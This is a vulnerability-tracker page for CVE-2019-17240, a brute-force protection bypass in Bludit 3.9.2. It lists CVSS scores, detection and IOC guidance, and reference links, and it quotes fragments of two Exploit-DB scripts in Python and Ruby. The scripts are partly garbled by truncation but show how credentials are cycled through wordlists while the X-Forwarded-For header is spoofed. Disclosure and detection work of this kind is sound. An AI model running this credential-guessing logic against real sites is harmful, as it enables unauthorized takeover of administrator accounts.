CVE-2019-17240
published 2019-10-06CVE-2019-17240: bl-kernel/security.class.php in Bludit 3.9.2 allows attackers to bypass a brute-force protection mechanism by using many different forged X-Forwarded-For or…
PriorityP272critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
39.60%
98.4th percentile
bl-kernel/security.class.php in Bludit 3.9.2 allows attackers to bypass a brute-force protection mechanism by using many different forged X-Forwarded-For or Client-IP HTTP headers.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bludit | bludit | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect brute-force bypass attempts by monitoring for repeated login requests containing spoofed X-Forwarded-For or Client-IP HTTP headers with many different IP values from the same source. ↗
- →Monitor POST requests to the Bludit login endpoint for the presence of a 'tokenCSRF' field alongside 'username' and 'password' fields, combined with rotating X-Forwarded-For or Client-IP header values, as an indicator of automated credential stuffing. ↗
- →Alert on HTTP responses containing 'has been blocked' text being bypassed by subsequent requests with different spoofed IP headers, indicating active exploitation of the brute-force mitigation bypass. ↗
- →Successful exploitation results in a redirect to /admin/dashboard; monitor for 302 Location headers pointing to /admin/dashboard following a series of login attempts with rotating IP headers. ↗
- ·The brute-force protection in Bludit 3.9.2 trusts client-supplied X-Forwarded-For and Client-IP headers for IP-based blocking, making it trivially bypassable by any attacker who rotates these header values. The vulnerable logic resides in bl-kernel/security.class.php. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv3.03.7LOWCVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Bludit 3.9.2 - Auth Bruteforce Bypass
exploitdb·2020-10-23·CVSS 9.8
CVE-2019-17240 [CRITICAL] Bludit 3.9.2 - Auth Bruteforce Bypass
Bludit 3.9.2 - Auth Bruteforce Bypass
---
#!/usr/bin/python3
# Exploit
## Title: Bludit {U}:{P}'.format(U = Username, P = Password))
#Conditional loops
if 'Location' in r.headers:
if "/admin/dashboard" in r.headers['Location']:
print()
log.info(f'SUCCESS !!')
log.success(f"Use Credential -> {Username}:{Password}")
sys.exit(0)
elif "has been blocked" in r.text:
log.failure(f"{Password} - Word BLOCKED")
#Reading User.txt & Pass.txt files
userfile = open(Username_list).readlines()
for Username in userfile:
Username = Username.strip()
passfile = open(Password_list).readlines()
for Password in passfile:
Password = Password.strip()
login(Username,Password)
Exploit-DB
Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass
exploitdb·2020-08-17·CVSS 9.8
CVE-2019-17240 [CRITICAL] Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass
Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass
---
#!/usr/bin/env ruby
## Title: Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass
## Author: noraj (Alexandre ZANNI)
## Author website: https://pwn.by/noraj/
## Date: 2020-08-16
## Vendor Homepage: https://www.bludit.com/
## Software Link: https://github.com/bludit/bludit/archive/3.9.2.tar.gz
## Version: "#{i}-#{password[..4]}",
}
data = {
'tokenCSRF' => csrf_token,
'username' => username,
'password' => password,
}
puts "[*] Trying password: #{password}"
auth_res = client.post(login_url, data, headers)
if auth_ok?(auth_res)
puts "\n[+] Password found: #{password}"
break
end
end
end
doc = -u -w [--debug]
#{__FILE__} -H | --help
Options:
-r , --root-url Root URL (base path) including HTTP scheme, port and root folder
-
No writeups or analysis indexed.
http://packetstormsecurity.com/files/158875/Bludit-3.9.2-Authentication-Bruteforce-Mitigation-Bypass.htmlhttp://packetstormsecurity.com/files/159664/Bludit-3.9.2-Bruteforce-Mitigation-Bypass.htmlhttps://github.com/bludit/bludit/pull/1090https://rastating.github.io/bludit-brute-force-mitigation-bypass/http://packetstormsecurity.com/files/158875/Bludit-3.9.2-Authentication-Bruteforce-Mitigation-Bypass.htmlhttp://packetstormsecurity.com/files/159664/Bludit-3.9.2-Bruteforce-Mitigation-Bypass.htmlhttps://github.com/bludit/bludit/pull/1090https://rastating.github.io/bludit-brute-force-mitigation-bypass/
2019-10-06
Published